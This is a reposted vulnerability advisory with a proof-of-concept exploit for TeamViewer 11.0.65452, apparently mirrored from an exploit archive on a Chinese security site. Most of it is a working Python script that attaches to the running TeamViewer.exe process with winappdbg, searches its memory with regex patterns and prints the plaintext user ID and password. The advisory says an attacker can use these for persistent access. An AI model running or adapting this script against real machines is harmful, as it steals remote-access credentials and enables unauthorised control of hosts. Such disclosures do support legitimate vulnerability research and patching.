首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛

当前位置：主页>安全文章>文章资料>Exploits>文章内容 TeamViewer 11.0.65452 (64 bit) - Local Credentials Disclosure 来源：http://www.korznikov.com 作者：Korznikov 发布时间：2016-09-08   ##### # TeamViewer 11.0.65452 (64 bit) Local Credentials Disclosure # Tested on Windows 7 64bit, English # Vendor Homepage @ https://www.teamviewer.com/ # Date 07/09/2016 # Bug Discovered by Alexander Korznikov (https://www.linkedin.com/in/nopernik) # # http://www.korznikov.com | @nopernik # # Special Thanks to: #       Viktor Minin (https://www.exploit-db.com/author/?a=8052) | (https://1-33-7.com/) #       Yakir Wizman (https://www.exploit-db.com/author/?a=1002) | (http://www.black-rose.ml) # ##### # TeamViewer 11.0.65452 is vulnerable to local credentials disclosure, the supplied userid and password are stored in a plaintext format in memory process. # There is no need in privilege account access. Credentials are stored in context of regular user. # A potential attacker could reveal the supplied username and password automaticaly and gain persistent access to host via TeamViewer services. # # Proof-Of-Concept Code: #####   from winappdbg import Debug, Process, HexDump import sys import re   filename = 'TeamViewer.exe'   def memory_search( pid ):         found = []         # Instance a Process object.         process = Process( pid )         # Search for the string in the process memory.           # Looking for User ID:         userid_pattern = '([0-9]\x00){3} \x00([0-9]\x00){3} \x00([0-9]\x00){3}[^)]'         for address in process.search_regexp( userid_pattern ):                  found += [address]                  print 'Possible UserIDs found:'         found = [i[-1] for i in found]         for i in set(found):            print i.replace('\x00','')                  found = []         # Looking for Password:         pass_pattern = '([0-9]\x00){4}\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00\x07\x00\x00'         for address in process.search_regexp( pass_pattern ):                  found += [process.read(address[0]-3,16)]         if found:             print '\nPassword:'         if len(found) > 1:             s = list(set([x for x in found if found.count(x) > 1]))             for i in s:                pwd = re.findall('[0-9]{4}',i.replace('\x00',''))[0]             print pwd         else:             print re.findall('[0-9]{4}',found[0].replace('\x00',''))[0]                  return found   debug = Debug() try:         # Lookup the currently running processes.         debug.system.scan_processes()         # For all processes that match the requested filename...         for ( process, name ) in debug.system.find_processes_by_filename( filename ):                 pid = process.get_pid()           memory_search(pid)             finally:         debug.stop()   [推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]   匿名评论 评论内容：(不能超过250字，需审核后才会公布，请自觉遵守互联网相关政策法规。  §最新评论：

热点文章 ·CVE-2012-0217 Intel sysret exp ·Linux Kernel 2.6.32 Local Root ·Array Networks vxAG / xAPV Pri ·Novell NetIQ Privileged User M ·Array Networks vAPV / vxAG Cod ·Excel SLYK Format Parsing Buff ·PhpInclude.Worm - PHP Scripts ·Apache 2.2.0 - 2.2.11 Remote e ·VideoScript 3.0 <= 4.0.1.50 Of ·Yahoo! Messenger Webcam 8.1 Ac ·Family Connections <= 1.8.2 Re ·Joomla Component EasyBook 1.1   相关文章 ·Multiple Applications - Local ·SugarCRM 6.5.23 - REST PHP Obj ·WIN-911 7.17.00 - Multiple Vul ·Adobe ColdFusion < 11 Update 1 ·glibc - getaddrinfo Stack Base ·Apache/mod_ssl OpenSSL < 0.9.6 ·MySQL 5.5.45 (64bit) - Local C ·Dropbox Desktop Client 9.4.49 ·Navicat Premium 11.2.11 (64bit ·LogMeIn Client 1.3.2462 (64bit ·Apple iCloud Desktop Client 5. ·Belkin F9K1122v1 1.00.30 - Buf   推荐广告

CopyRight © 2002-2022 VFocuS.Net All Rights Reserved